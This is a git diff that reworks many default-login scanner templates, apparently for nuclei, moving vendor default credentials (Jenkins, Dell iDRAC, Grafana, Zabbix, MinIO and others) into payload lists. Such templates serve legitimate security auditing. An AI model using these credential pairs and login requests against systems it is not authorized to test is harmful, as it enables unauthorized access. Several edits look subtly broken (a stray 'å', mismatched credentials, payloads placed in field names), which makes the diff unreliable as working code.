a/default-logins/axis2/axis2-default-login.yaml +++ b/default-logins/axis2/axis2-default-login.yaml @@ -7,13 +7,27 @@ info: tags: axis,apache,default-login requests: - - method: POST - path: - - "{{BaseURL}}/axis2-admin/login" - - "{{BaseURL}}/axis2/axis2-admin/login" - headers: - Content-Type: application/x-www-form-urlencoded - body: "userName=admin&password=axis2&submit=+Login+" + - raw: + - | + POST /axis2-admin/login HTTP/1.1 + Host: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + + loginUsername={{username}}&loginPassword={{password}} + + - | + POST /axis2/axis2-admin/login HTTP/1.1 + Host: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + + userName={{username}}&password={{password}}&submit=+Login+ + + payloads: + username: + - admin + password: + - axis2 + attack: pitchfork matchers-condition: and matchers: diff --git a/default-logins/azkaban/azkaban-default-login.yaml b/default-logins/azkaban/azkaban-default-login.yaml index ae21b174e8..5d9e13ca58 100644 --- a/default-logins/azkaban/azkaban-default-login.yaml +++ b/default-logins/azkaban/azkaban-default-login.yaml @@ -14,8 +14,14 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - action=login&username=admin&password=admin + action=login&username={{username}}&password={{password}} + payloads: + username: + - admin + password: + - admin + attack: pitchfork matchers-condition: and matchers: - type: word diff --git a/default-logins/chinaunicom/chinaunicom-default-login.yaml b/default-logins/chinaunicom/chinaunicom-default-login.yaml index 0fe2cf1a2e..7c0f7e6c06 100644 --- a/default-logins/chinaunicom/chinaunicom-default-login.yaml +++ b/default-logins/chinaunicom/chinaunicom-default-login.yaml @@ -7,10 +7,20 @@ info: tags: chinaunicom,default-login requests: - - method: POST - path: - - "{{BaseURL}}/cu.html" - body: "frashnum=&action=login&Frm_Logintoken=1&Username=CUAdmin&Password=CUAdmin&Username=&Password=" + - raw: + - | + POST /cu.html HTTP/1.1 + Host: {{BaseURL}} + + "frashnum=&action=login&Frm_Logintoken=1&Username={{username}}&Password={{password}}&Username=&Password=" + + payloads: + username: + - CUAdmin + password: + - CUAdmin + attack: pitchfork + matchers-condition: and matchers: - type: status diff --git a/default-logins/dell/dell-idrac-default-login.yaml b/default-logins/dell/dell-idrac-default-login.yaml index 95bc7ea11b..f531c8a4af 100644 --- a/default-logins/dell/dell-idrac-default-login.yaml +++ b/default-logins/dell/dell-idrac-default-login.yaml @@ -6,11 +6,19 @@ info: tags: dell,idrac,default-login requests: - - method: POST - path: - - "{{BaseURL}}/data/login" + - raw: + - | + POST /data/login HTTP/1.1 + Host: {{BaseURL}} - body: "user=root&password=calvin" + user={{username}}&password={{password}} + + payloads: + username: + - root + password: + - calvin + attack: pitchfork headers: Content-Type: "application/x-www-form-urlencode" diff --git a/default-logins/dell/dell-idrac9-default-login.yaml b/default-logins/dell/dell-idrac9-default-login.yaml index 8c71a04c75..d60325405b 100644 --- a/default-logins/dell/dell-idrac9-default-login.yaml +++ b/default-logins/dell/dell-idrac9-default-login.yaml @@ -11,8 +11,15 @@ requests: - | POST /sysmgmt/2015/bmc/session HTTP/1.1 Host: {{Hostname}} - User: "root" - Password: "calvin" + User: "{{username}}" + Password: "{{password}}" + + payloads: + username: + - root + password: + - calvin + attack: pitchfork matchers-condition: and matchers: diff --git a/default-logins/dell/emcecom-default-login.yaml b/default-logins/dell/emcecom-default-login.yaml index 4680d52fe3..9cd443f6f9 100644 --- a/default-logins/dell/emcecom-default-login.yaml +++ b/default-logins/dell/emcecom-default-login.yaml @@ -9,11 +9,18 @@ info: tags: dell,emc,ecom,default-login requests: - - method: GET - path: - - '{{BaseURL}}' - headers: - Authorization: Basic YWRtaW46IzFQYXNzd29yZA== + - raw: + - | + GET / HTTP/1.1 + Host: {{BaseURL}} + Authorization: Basic {{base64(username + ':' + password)}} + + payloads: + username: + - root + password: + - calvin + attack: pitchfork matchers-condition: and matchers: diff --git a/default-logins/druid/druid-default-login.yaml b/default-logins/druid/druid-default-login.yaml index 01ea6a9026..44771c5683 100644 --- a/default-logins/druid/druid-default-login.yaml +++ b/default-logins/druid/druid-default-login.yaml @@ -7,12 +7,25 @@ info: tags: druid,default-login requests: - - method: POST - path: - - "{{BaseURL}}/druid/submitLogin" - - "{{BaseURL}}/submitLogin" + - raw: + - | + POST /druid/submitLogin HTTP/1.1 + Host: {{BaseURL}} - body: "loginUsername=admin&loginPassword=admin" + loginUsername={{username}}&loginPassword={{password}} + + - | + POST /submitLogin HTTP/1.1 + Host: {{BaseURL}} + + loginUsername={{username}}&loginPassword={{password}} + + payloads: + username: + - admin + password: + - admin + attack: pitchfork matchers-condition: and matchers: diff --git a/default-logins/dvwa/dvwa-default-login.yaml b/default-logins/dvwa/dvwa-default-login.yaml index 4cf084572e..941c2c30d0 100644 --- a/default-logins/dvwa/dvwa-default-login.yaml +++ b/default-logins/dvwa/dvwa-default-login.yaml @@ -20,7 +20,14 @@ requests: Cookie: PHPSESSID={{session}}; security=low Connection: close - username=admin&password=password&Login=Login&user_token={{token}} + username={{username}}&password={{password}}&Login=Login&user_token={{token}} + + payloads: + username: + - admin + password: + - password + attack: pitchfork extractors: - type: regex diff --git a/default-logins/exacqvision/exacqvision-default-login.yaml b/default-logins/exacqvision/exacqvision-default-login.yaml index 3f1e2abe4a..e04d3a0f7f 100644 --- a/default-logins/exacqvision/exacqvision-default-login.yaml +++ b/default-logins/exacqvision/exacqvision-default-login.yaml @@ -15,7 +15,14 @@ requests: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Connection: close - action=login&u=admin&p=admin256 + action=login&u={{username}}&p={{password}} + + payloads: + username: + - admin + password: + - admin256 + attack: pitchfork matchers-condition: and matchers: diff --git a/default-logins/flir/flir-default-login.yaml b/default-logins/flir/flir-default-login.yaml index ae4bc0b20a..9cb112ad91 100644 --- a/default-logins/flir/flir-default-login.yaml +++ b/default-logins/flir/flir-default-login.yaml @@ -14,7 +14,14 @@ requests: Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - user_name=admin&user_password=admin + user_name={{username}}&user_password={{password}} + + payloads: + username: + - admin + password: + - admin + attack: pitchfork matchers-condition: and matchers: diff --git a/default-logins/frps/frp-default-login.yaml b/default-logins/frps/frp-default-login.yaml index 91915c07fb..c05cc9d9c2 100644 --- a/default-logins/frps/frp-default-login.yaml +++ b/default-logins/frps/frp-default-login.yaml @@ -8,11 +8,18 @@ info: reference: https://github.com/fatedier/frp/issues/1840 requests: - - method: GET - path: - - "{{BaseURL}}/api/proxy/tcp" - headers: - Authorization: "Basic YWRtaW46YWRtaW4=" + - raw: + - | + GET /api/proxy/tcp HTTP/1.1 + Host: {{BaseURL}} + Authorization: Basic {{base64(username + ':' + password)}} + + payloads: + username: + - admin + password: + - admin + attack: pitchfork matchers-condition: and matchers: diff --git a/default-logins/gitlab/gitlab-weak-login.yaml b/default-logins/gitlab/gitlab-weak-login.yaml index 7f40fcc2de..510107c71c 100644 --- a/default-logins/gitlab/gitlab-weak-login.yaml +++ b/default-logins/gitlab/gitlab-weak-login.yaml @@ -17,13 +17,13 @@ requests: Referer: {{BaseURL}} content-type: application/json - {"grant_type":"password","username":"§gitlab_user§","password":"§gitlab_password§"} + {"grant_type":"password","username":"{{username}}","password":"{{password}}"} payloads: - gitlab_password: + password: - 12345 - 123456789 - gitlab_user: + username: - 1234 - admin diff --git a/default-logins/glpi/glpi-default-login.yaml b/default-logins/glpi/glpi-default-login.yaml index 36069bddc3..9a3f2b190d 100644 --- a/default-logins/glpi/glpi-default-login.yaml +++ b/default-logins/glpi/glpi-default-login.yaml @@ -20,7 +20,14 @@ requests: Content-Type: application/x-www-form-urlencoded Referer: {{BaseURL}} - {{name}}=glpi&{{password}}=glpi&auth=local&submit=Submit&_glpi_csrf_token={{token}} + {{name}}={{username}}&{{passwords}}={{password}}&auth=local&submit=Submit&_glpi_csrf_token={{token}} + + payloads: + username: + - glpi + password: + - glpi + attack: pitchfork cookie-reuse: true redirects: true @@ -43,7 +50,7 @@ requests: - "type=\"text\" name=\"([0-9a-z]+)\" id=\"login_name\" required=\"required\"" - type: regex - name: password + name: passwords part: body internal: true group: 1 diff --git a/default-logins/grafana/grafana-default-login.yaml b/default-logins/grafana/grafana-default-login.yaml index efea21f9ff..81feed8c51 100644 --- a/default-logins/grafana/grafana-default-login.yaml +++ b/default-logins/grafana/grafana-default-login.yaml @@ -19,11 +19,13 @@ requests: Referer: {{BaseURL}} content-type: application/json - {"user":"admin","password":"§grafana_password§"} + {"user":"{{username}}","password":"{{password}}"} payloads: - grafana_password: + username: + - admin + password: - prom-operator - admin diff --git a/default-logins/guacamole/guacamole-default-login.yaml b/default-logins/guacamole/guacamole-default-login.yaml index e35338f606..3ab8960dd6 100644 --- a/default-logins/guacamole/guacamole-default-login.yaml +++ b/default-logins/guacamole/guacamole-default-login.yaml @@ -16,7 +16,14 @@ requests: Origin: {{Hostname}} Referer: {{Hostname}} - username=guacadmin&password=guacadmin + username={{username}}&password={{password}} + + payloads: + username: + - guacadmin + password: + - guacadmin + attack: pitchfork matchers-condition: and matchers: diff --git a/default-logins/hongdian/hongdian-default-login.yaml b/default-logins/hongdian/hongdian-default-login.yaml index d7f574e5ad..a1549c0fa0 100644 --- a/default-logins/hongdian/hongdian-default-login.yaml +++ b/default-logins/hongdian/hongdian-default-login.yaml @@ -11,17 +11,26 @@ requests: - | GET / HTTP/1.1 Host: {{Hostname}} - Authorization: Basic Z3Vlc3Q6Z3Vlc3Q= + Authorization: Basic {{base64(username + ':' + password)}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate - | GET / HTTP/1.1 Host: {{Hostname}} - Authorization: Basic YWRtaW46YWRtaW4= + Authorization: Basic {{base64(username + ':' + password)}} Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate + payloads: + username: + - guest + - admin + password: + - guest + - admin + attack: pitchfork + matchers-condition: and matchers: - type: word diff --git a/default-logins/hortonworks/smartsense-default-login.yaml b/default-logins/hortonworks/smartsense-default-login.yaml index a4593fc854..419f8daafc 100644 --- a/default-logins/hortonworks/smartsense-default-login.yaml +++ b/default-logins/hortonworks/smartsense-default-login.yaml @@ -9,11 +9,18 @@ info: tags: hortonworks,smartsense,default-login requests: - - method: GET - path: - - '{{BaseURL}}/apt/v1/context' - headers: - Authorization: Basic YWRtaW46YWRtaW4= + - raw: + - | + GET /apt/v1/context HTTP/1.1 + Host: {{BaseURL}} + Authorization: Basic {{base64(username + ':' + password)}} + + payloads: + username: + - admin + password: + - admin + attack: pitchfork matchers-condition: and matchers: diff --git a/default-logins/hp/hp-switch-default-login.yaml b/default-logins/hp/hp-switch-default-login.yaml index e45b5f510f..aa854686cb 100644 --- a/default-logins/hp/hp-switch-default-login.yaml +++ b/default-logins/hp/hp-switch-default-login.yaml @@ -14,7 +14,13 @@ requests: POST /htdocs/login/login.lua HTTP/1.1 Host: {{Hostname}} - username=admin&password= + username={{username}}&password= + + payloads: + username: + - admin + + attack: sniper matchers-condition: and matchers: diff --git a/default-logins/ibm/ibm-storage-default-credential.yaml b/default-logins/ibm/ibm-storage-default-credential.yaml index 21a47dde00..6b2df92269 100644 --- a/default-logins/ibm/ibm-storage-default-credential.yaml +++ b/default-logins/ibm/ibm-storage-default-credential.yaml @@ -14,7 +14,14 @@ requests: Origin: {{BaseURL}} Content-Type: application/x-www-form-urlencoded - j_username=admin&j_password=admin&continue=&submit=submit+form + j_username={{username}}&j_password={{password}}&continue=&submit=submit+form + + payloads: + username: + - admin + password: + - admin + attack: pitchfork matchers-condition: and matchers: diff --git a/default-logins/idemia/idemia-biometrics-default-login.yaml b/default-logins/idemia/idemia-biometrics-default-login.yaml index 4721e74d28..c7c18531bf 100644 --- a/default-logins/idemia/idemia-biometrics-default-login.yaml +++ b/default-logins/idemia/idemia-biometrics-default-login.yaml @@ -9,11 +9,17 @@ info: tags: idemia,biometrics,default-login requests: - - method: POST - path: - - '{{BaseURL}}/cgi-bin/login.cgi' + - raw: + - | + POST /cgi-bin/login.cgi HTTP/1.1 + Host: {{BaseURL}} - body: password=12345 + password={{password}} + + payloads: + password: + - 12345 + attack: sniper matchers-condition: and matchers: diff --git a/default-logins/iptime/iptime-default-login.yaml b/default-logins/iptime/iptime-default-login.yaml index da94fcec13..d6a42f5490 100644 --- a/default-logins/iptime/iptime-default-login.yaml +++ b/default-logins/iptime/iptime-default-login.yaml @@ -13,7 +13,14 @@ requests: Host: {{Hostname}} Referer: {{BaseURL}}/sess-bin/login_session.cgi - username=admin&passwd=admin + username={{username}}&passwd={{password}} + + payloads: + username: + - admin + password: + - admin + attack: pitchfork matchers-condition: and matchers: diff --git a/default-logins/jenkins/jenkins-default.yaml b/default-logins/jenkins/jenkins-default.yaml index 2d793558cc..72f188bd35 100644 --- a/default-logins/jenkins/jenkins-default.yaml +++ b/default-logins/jenkins/jenkins-default.yaml @@ -18,7 +18,7 @@ requests: Content-Type: application/x-www-form-urlencoded Cookie: {{cookie}} - j_username=admin&j_password=admin&from=%2F&Submit=Sign+in + j_username={{username}}&j_password={{password}}&from=%2F&Submit=Sign+in - | POST /j_spring_security_check HTTP/1.1 @@ -26,13 +26,22 @@ requests: Content-Type: application/x-www-form-urlencoded Cookie: {{cookie}} - j_username=jenkins&j_password=password&from=%2F&Submit=Sign+in + j_username={{username}}&j_password={{password}}&from=%2F&Submit=Sign+in - | GET / HTTP/1.1 Host: {{Hostname}} Cookie: {{cookie}} + payloads: + username: + - admin + - jenkins + password: + - admin + - password + attack: pitchfork + extractors: - type: regex name: cookie diff --git a/default-logins/minio/minio-default-login.yaml b/default-logins/minio/minio-default-login.yaml index 8fe40766bf..688c5ec225 100644 --- a/default-logins/minio/minio-default-login.yaml +++ b/default-logins/minio/minio-default-login.yaml @@ -7,23 +7,20 @@ info: tags: default-login,minio requests: - - method: POST - path: - - "{{BaseURL}}/minio/webrpc" + - raw: + - | + POST /minio/webrpc HTTP/1.1 + Host: {{BaseURL}} + Content-Type: application/json - headers: - Content-Type: application/json + {"id":1,"jsonrpc":"2.0","params":{"username":"{{username}}","password":"{{password}}"},"method":"Web.Login"} - body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"Web.Login"}' - - - method: POST - path: - - "{{BaseURL}}/minio/webrpc" - - headers: - Content-Type: application/json - - body: '{"id":1,"jsonrpc":"2.0","params":{"username":"minioadmin","password":"minioadmin"},"method":"web.Login"}' + payloads: + username: + - minioadmin + password: + - minioadmin + attack: pitchfork matchers-condition: and matchers: diff --git a/default-logins/nagios/nagios-default-login.yaml b/default-logins/nagios/nagios-default-login.yaml index fcb25e0ee3..23add6498c 100644 --- a/default-logins/nagios/nagios-default-login.yaml +++ b/default-logins/nagios/nagios-default-login.yaml @@ -6,16 +6,25 @@ info: tags: nagios,default-login reference: https://www.nagios.org requests: - - method: GET - path: - - "{{BaseURL}}/nagios/side.php" - headers: - Authorization: Basic bmFnaW9zYWRtaW46bmFnaW9zYWRtaW4= + - raw: + - | + GET /nagios/side.php HTTP/1.1 + Host: {{BaseURL}} + Authorization: Basic {{base64(username + ':' + password)}} + + payloads: + username: + - nagiosadmin + - root + password: + - nagiosadmin + - nagiosxi + attack: pitchfork matchers-condition: and matchers: - type: status - status: + status:å - 200 - type: word words: diff --git a/default-logins/nexus/nexus-default-login.yaml b/default-logins/nexus/nexus-default-login.yaml index 187dd37286..4decf4e751 100644 --- a/default-logins/nexus/nexus-default-login.yaml +++ b/default-logins/nexus/nexus-default-login.yaml @@ -14,7 +14,14 @@ requests: X-Nexus-UI: true Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - username=YWRtaW4%3D&password=YWRtaW4xMjM%3D + username={{base64(username)}}&password={{base64(password)}} + + payloads: + username: + - admin + password: + - admin123 + attack: pitchfork matchers-condition: and matchers: diff --git a/default-logins/nps/nps-default-login.yaml b/default-logins/nps/nps-default-login.yaml index 329b5acb7e..c1fdfc115f 100644 --- a/default-logins/nps/nps-default-login.yaml +++ b/default-logins/nps/nps-default-login.yaml @@ -7,13 +7,21 @@ info: tags: nps,default-login requests: - - method: POST - path: - - "{{BaseURL}}/login/verify" - body: "username=admin&password=123" - headers: - Content-Type: application/x-www-form-urlencoded - Referer: "{{Hostname}}/login/index" + - raw: + - | + POST /login/verify HTTP/1.1 + Host: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{Hostname}}/login/index + + username={{username}}&password={{password}} + + payloads: + username: + - admin + password: + - 123 + attack: pitchfork matchers-condition: and matchers: diff --git a/default-logins/ofbiz/ofbiz-default-login.yaml b/default-logins/ofbiz/ofbiz-default-login.yaml index 6a10fbeed3..a56be731de 100644 --- a/default-logins/ofbiz/ofbiz-default-login.yaml +++ b/default-logins/ofbiz/ofbiz-default-login.yaml @@ -7,12 +7,21 @@ info: tags: ofbiz,default-login requests: - - method: POST - path: - - '{{BaseURL}}/control/login' - headers: - Content-Type: application/x-www-form-urlencoded - body: USERNAME=admin&PASSWORD=ofbiz&FTOKEN=&JavaScriptEnabled=Y + - raw: + - | + POST /control/login HTTP/1.1 + Host: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + + USERNAME={{username}}&PASSWORD={{password}}&FTOKEN=&JavaScriptEnabled=Y + + payloads: + username: + - admin + password: + - ofbiz + attack: pitchfork + matchers: - type: word words: diff --git a/default-logins/oracle/businessintelligence-default-login.yaml b/default-logins/oracle/businessintelligence-default-login.yaml index 0722fab2d9..a89df1808c 100644 --- a/default-logins/oracle/businessintelligence-default-login.yaml +++ b/default-logins/oracle/businessintelligence-default-login.yaml @@ -19,13 +19,20 @@ requests: - Administrator - Administrator + {{username}} + {{password}} bi + payloads: + username: + - Administrator + password: + - Administrator + attack: pitchfork + matchers-condition: and matchers: - type: status diff --git a/default-logins/paloalto/panos-default-login.yaml b/default-logins/paloalto/panos-default-login.yaml index 1631b3132e..b71ddef7d3 100644 --- a/default-logins/paloalto/panos-default-login.yaml +++ b/default-logins/paloalto/panos-default-login.yaml @@ -9,11 +9,20 @@ info: tags: paloalto,panos,default-login requests: - - method: POST - path: - - '{{BaseURL}}/php/login.php' + - raw: + - | + POST /php/login.php HTTP/1.1 + Host: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded - body: user=admin&passwd=admin&challengePwd=&ok=Login + user={{username}}&passwd={{password}}&challengePwd=&ok=Login + + payloads: + username: + - admin + password: + - admin + attack: pitchfork matchers-condition: and matchers: diff --git a/default-logins/panabit/panabit-default-login.yaml b/default-logins/panabit/panabit-default-login.yaml index d69c44cc3f..d790a10942 100644 --- a/default-logins/panabit/panabit-default-login.yaml +++ b/default-logins/panabit/panabit-default-login.yaml @@ -19,15 +19,22 @@ requests: Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 ------WebKitFormBoundaryAjZMsILtbrBp8VbC - Content-Disposition: form-data; name="username" + Content-Disposition: form-data; name="{{username}}" admin ------WebKitFormBoundaryAjZMsILtbrBp8VbC - Content-Disposition: form-data; name="password" + Content-Disposition: form-data; name="{{password}}" panabit ------WebKitFormBoundaryAjZMsILtbrBp8VbC-- + payloads: + username: + - username + password: + - password + attack: pitchfork + matchers-condition: and matchers: - type: word diff --git a/default-logins/rabbitmq/rabbitmq-default-login.yaml b/default-logins/rabbitmq/rabbitmq-default-login.yaml index 1f8dc9b5d7..cce9613915 100644 --- a/default-logins/rabbitmq/rabbitmq-default-login.yaml +++ b/default-logins/rabbitmq/rabbitmq-default-login.yaml @@ -7,11 +7,20 @@ info: tags: rabbitmq,default-login requests: - - method: GET - path: - - "{{BaseURL}}/api/whoami" - headers: - Authorization: "Basic Z3Vlc3Q6Z3Vlc3Q=" + - raw: + - | + GET /api/whoami HTTP/1.1 + Host: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + Authorization: Basic {{base64(username + ':' + password)}} + + payloads: + username: + - guest + password: + - guest + attack: pitchfork + matchers-condition: and matchers: - type: word diff --git a/default-logins/ricoh/ricoh-weak-password.yaml b/default-logins/ricoh/ricoh-weak-password.yaml index a7db0ce8a6..8e21ee4482 100644 --- a/default-logins/ricoh/ricoh-weak-password.yaml +++ b/default-logins/ricoh/ricoh-weak-password.yaml @@ -14,7 +14,12 @@ requests: Host: {{Hostname}} Cookie: cookieOnOffChecker=on; - wimToken=&userid_work=&userid=YWRtaW4%3D&password_work=&password=&open= + wimToken=&userid_work=&userid={{base64(username)}}&password_work=&password=&open= + + payloads: + username: + - admin + attack: pitchfork matchers-condition: and matchers: diff --git a/default-logins/rockmongo/rockmongo-default-login.yaml b/default-logins/rockmongo/rockmongo-default-login.yaml index 5a1bf55b42..8fb0fdf1ee 100644 --- a/default-logins/rockmongo/rockmongo-default-login.yaml +++ b/default-logins/rockmongo/rockmongo-default-login.yaml @@ -14,7 +14,14 @@ requests: Content-Type: application/x-www-form-urlencoded Referer: {{Hostname}}/index.php?action=login.index - more=0&host=0&username=admin&password=admin&db=&lang=en_us&expire=3 + more=0&host=0&username={{username}}&password={{password}}&db=&lang=en_us&expire=3 + + payloads: + username: + - admin + password: + - admin + attack: pitchfork matchers-condition: and matchers: diff --git a/default-logins/samsung/samsung-wlan-default-login.yaml b/default-logins/samsung/samsung-wlan-default-login.yaml index bb29f3d888..532af39f49 100644 --- a/default-logins/samsung/samsung-wlan-default-login.yaml +++ b/default-logins/samsung/samsung-wlan-default-login.yaml @@ -8,10 +8,19 @@ info: tags: samsung,default-login requests: - - method: POST - path: - - "{{BaseURL}}/main.ehp" - body: "httpd;General;lang=en&login_id=root&login_pw=sweap12~" + - raw: + - | + POST /main.ehp HTTP/1.1 + Host: {{BaseURL}} + + "httpd;General;lang=en&login_id={{username}}&login_pw={{password}}" + + payloads: + username: + - root + password: + - sweap12~ + attack: pitchfork matchers-condition: and matchers: diff --git a/default-logins/showdoc/showdoc-default-login.yaml b/default-logins/showdoc/showdoc-default-login.yaml index 16b59aaf5d..b4910e3e9b 100644 --- a/default-logins/showdoc/showdoc-default-login.yaml +++ b/default-logins/showdoc/showdoc-default-login.yaml @@ -9,14 +9,21 @@ info: tags: showdoc,default-login requests: - - method: POST - path: - - "{{BaseURL}}/server/index.php?s=/api/user/login" - body: | - username=showdoc&password=123456&v_code= + - raw: + - | + POST /server/index.php?s=/api/user/login HTTP/1.1 + Host: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded;charset=UTF-8 + + username={{username}}&password={{password}}&v_code= + + payloads: + username: + - showdoc + password: + - 123456 + attack: pitchfork - headers: - Content-Type: application/x-www-form-urlencoded;charset=UTF-8 matchers-condition: and matchers: diff --git a/default-logins/solarwinds/solarwinds-default-login.yaml b/default-logins/solarwinds/solarwinds-default-login.yaml index 191e232c4b..6e8133a122 100644 --- a/default-logins/solarwinds/solarwinds-default-login.yaml +++ b/default-logins/solarwinds/solarwinds-default-login.yaml @@ -12,12 +12,22 @@ info: # {"PollerType":"Hello, world! from nuclei :-P", "NetObject":"N:1337", "NetObjectType":"N", "NetObjectID":1337} requests: - - method: GET - path: - - "{{BaseURL}}/SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS" # First path is default base path - - "{{BaseURL}}/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS" - headers: - Authorization: "Basic YWRtaW46" + - raw: + - | + GET /SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1 + Host: {{BaseURL}} + Authorization: Basic {{base64(username)}} + + - | + GET /InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1 + Host: {{BaseURL}} + Authorization: Basic {{base64(username)}} + + payloads: + username: + - admin + attack: pitchfork + matchers-condition: and matchers: - type: word diff --git a/default-logins/spectracom/spectracom-default-login.yaml b/default-logins/spectracom/spectracom-default-login.yaml index 401684b2fd..07b09fe30a 100644 --- a/default-logins/spectracom/spectracom-default-login.yaml +++ b/default-logins/spectracom/spectracom-default-login.yaml @@ -13,7 +13,14 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - data%5Bbutton%5D=submit&data%5BUser%5D%5Busername%5D=spadmin&data%5BUser%5D%5Bpassword%5D=admin123 + data%5Bbutton%5D=submit&data%5BUser%5D%5Busername%5D={{username}}&data%5BUser%5D%5Bpassword%5D={{password}} + + payloads: + username: + - spadmin + password: + - admin123 + attack: pitchfork matchers-condition: and matchers: diff --git a/default-logins/szhe/szhe-default-login.yaml b/default-logins/szhe/szhe-default-login.yaml index ea60ca2694..6c25fb3458 100644 --- a/default-logins/szhe/szhe-default-login.yaml +++ b/default-logins/szhe/szhe-default-login.yaml @@ -9,13 +9,20 @@ info: - https://github.com/Cl0udG0d/SZhe_Scan # vendor homepage requests: - - method: POST - path: - - "{{BaseURL}}/login/" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - email=springbird@qq.com&password=springbird&remeber=true + - raw: + - | + POST /login/ HTTP/1.1 + Host: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + + email={{username}}&password={{password}}&remeber=true + + payloads: + username: + - springbird@qq.com + password: + - springbird + attack: pitchfork matchers-condition: and matchers: diff --git a/default-logins/vidyo/vidyo-default-login.yaml b/default-logins/vidyo/vidyo-default-login.yaml index 12541056e9..a9eb24bbcc 100644 --- a/default-logins/vidyo/vidyo-default-login.yaml +++ b/default-logins/vidyo/vidyo-default-login.yaml @@ -24,7 +24,14 @@ requests: Referer: {{RootURL}}/super/login.html?lang=en Cookie: JSESSIONID={{session}} ; VidyoPortalSuperLanguage=en - username=super&password=password + username={{username}}&password={{password}} + + payloads: + username: + - super + password: + - password + attack: pitchfork extractors: - type: regex diff --git a/default-logins/viewpoint/trilithic-viewpoint-login.yaml b/default-logins/viewpoint/trilithic-viewpoint-login.yaml index 49efa15a32..d26dd6f456 100644 --- a/default-logins/viewpoint/trilithic-viewpoint-login.yaml +++ b/default-logins/viewpoint/trilithic-viewpoint-login.yaml @@ -16,7 +16,14 @@ requests: Content-Type: application/json Cookie: trilithic_win_auth=false - {u:"admin", t:"undefined", p:"trilithic", d:"", r:false, w:false} + {u:"{{username}}", t:"undefined", p:"{{password}}", d:"", r:false, w:false} + + payloads: + username: + - admin + password: + - trilithic + attack: pitchfork matchers-condition: and matchers: diff --git a/default-logins/visionhub/visionhub-default-login.yaml b/default-logins/visionhub/visionhub-default-login.yaml index 73b47bbc33..cd46c4dd62 100644 --- a/default-logins/visionhub/visionhub-default-login.yaml +++ b/default-logins/visionhub/visionhub-default-login.yaml @@ -9,11 +9,18 @@ info: reference: https://www.qognify.com/products/visionhub/ requests: - - method: POST - path: - - '{{BaseURL}}/VisionHubWebApi/api/Login' - headers: - Authorization: Basic YWRtaW46YWRtaW4= + - raw: + - | + POST /VisionHubWebApi/api/Login HTTP/1.1 + Host: {{BaseURL}} + Authorization: Basic {{base64(username + ':' + password)}} + + payloads: + username: + - admin + password: + - admin + attack: pitchfork matchers-condition: and matchers: diff --git a/default-logins/wifisky/wifisky-default-login.yaml b/default-logins/wifisky/wifisky-default-login.yaml index 260722f63c..c6d731deb0 100644 --- a/default-logins/wifisky/wifisky-default-login.yaml +++ b/default-logins/wifisky/wifisky-default-login.yaml @@ -16,7 +16,14 @@ requests: Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Connection: close - username=admin&password=admin + username={{username}}&password={{password}} + + payloads: + username: + - admin + password: + - admin + attack: pitchfork matchers-condition: and matchers: diff --git a/default-logins/wso2/wso2-default-login.yaml b/default-logins/wso2/wso2-default-login.yaml index 89b6bac30f..9e3fd49b53 100644 --- a/default-logins/wso2/wso2-default-login.yaml +++ b/default-logins/wso2/wso2-default-login.yaml @@ -14,7 +14,14 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - username=admin&password=admin + username={{username}}&password={{password}} + + payloads: + username: + - admin + password: + - admin + attack: pitchfork redirects: false matchers: diff --git a/default-logins/xxljob/xxljob-default-login.yaml b/default-logins/xxljob/xxljob-default-login.yaml index daf9ed85be..11e08ec55c 100644 --- a/default-logins/xxljob/xxljob-default-login.yaml +++ b/default-logins/xxljob/xxljob-default-login.yaml @@ -14,7 +14,14 @@ requests: Host:{{Hostname}} Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - userName=admin&password=123456 + userName={{username}}&password={{password}} + + payloads: + username: + - admin + password: + - 123456 + attack: pitchfork matchers-condition: and matchers: diff --git a/default-logins/zabbix/zabbix-default-login.yaml b/default-logins/zabbix/zabbix-default-login.yaml index 7f7c15adc4..57c559d408 100644 --- a/default-logins/zabbix/zabbix-default-login.yaml +++ b/default-logins/zabbix/zabbix-default-login.yaml @@ -7,14 +7,21 @@ info: tags: zabbix,default-login requests: - - method: POST - path: - - '{{BaseURL}}/index.php' - headers: - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-Requested-With: XMLHttpRequest + - raw: + - | + POST /index.php HTTP/1.1 + Host:{{BaseURL}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest - body: name=Admin&password=zabbix&autologin=1&enter=Sign+in + name={{username}}&password={{password}}&autologin=1&enter=Sign+in + + payloads: + username: + - Admin + password: + - zabbix + attack: pitchfork matchers-condition: and matchers: diff --git 